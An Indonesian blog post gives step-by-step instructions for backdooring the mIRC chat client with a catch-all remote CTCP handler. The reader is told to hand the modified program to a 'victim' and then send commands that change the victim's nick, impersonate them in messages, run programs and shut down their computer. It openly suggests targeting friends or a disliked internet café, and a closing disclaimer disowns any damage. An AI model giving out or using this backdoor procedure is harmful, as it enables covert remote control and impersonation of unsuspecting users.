Cara Hack Mirc dan Menjahili Si Korban

Bisa ngga ya….. manusia make komputer buat ngejahilin temannya ??

Pertanyaan besar abad ini !! whehe..he.. hiperbola nech…..

Setiap manusia kan pasti punyai sifat kejahilan, betul tidak? Ternyata ngga cuman didunia nyata aja, bahkan didunia maya juga terjadi jahil-menjahili !!

Emang dah! Dasar manusia gak da rotan, akar pun jadi …

Buktinya neh, kita bisa mengendalikan komputer orang lain lho… pengen tau kan caranya?

Gampang koq, ini juga saya ambil dari www.jasakom.com, lumayan juga informasi yang diberikan… bisa dipake buat jahili temen atau warnet yang kita benci… hehe…

Cukup dengan menggunakan mirc kita bisa menyalurkan sifat kejahilan ini. Beberapa hal yang harus dipersiapkan adalah :

1. program mirc 

2. Jalankan mirc 

3. Setelah program mirc terbuka, tekan ALT+R

4. Tambahkan syntax ini ctcp *:*:?:$1- lalu tekan OK

5. Close program mirc 

Berikan program mirc tadi yang sudah di berikan script khusus kepada calon korban anda, anda bisa mengambilnya di c:\program files\mirc copy-kan seluruh isi yang berada di folder mirc, setelah itu berikan kepada calon korban anda. 

Ketika korban sudah online menggunakan mirc, kita sudah bisa menjahili si korban, mulai dari mematikan komputer, mengganti nick si korban, mengirim pesan ke orang lain menggunakan nick korban, hingga menjalankan program yang ada di komputer si korban

Ingin tahu caranya? saya beranggapan step diatas sudah anda lakukan dan berhasil, saya sarankan anda juga mengetahui nick yang sedang korban jalankan contoh hack_jahil . Saya akan mengajarkan bagaimana menjahili si korban. Dan yang perlu kita lakukan adalah, mengetikan script pada mirc kita… (ingat kita harus sudah connect ke server dan sudah bisa melakukan chat)

Untuk merubah nick si korban dengan nick baru yang anda inginkan. ketikan script ini pada message anda /ctcp hack_jahil nick gua_loe 

Mengirim pesan ke orang lain menggunakan nick korban /ctcp gua_loe msg nick-yg-mau-di-msg/#channel tesssstessssssstesssssss123 

Supaya dia menjalankan program /ctcp gua_loe run iexplore.exe www.anfidz.web.id 

Untuk menshut down komputer korban /ctcp gua_loe run rundll32.exe user,exitwindows 

Warning: Segala kerugian yang ditimbulkan bukan tanggung jawab penulis, artikel ini hanya untuk pengetahuan semata.

0 comments:

Posting Komentar

Video Gallery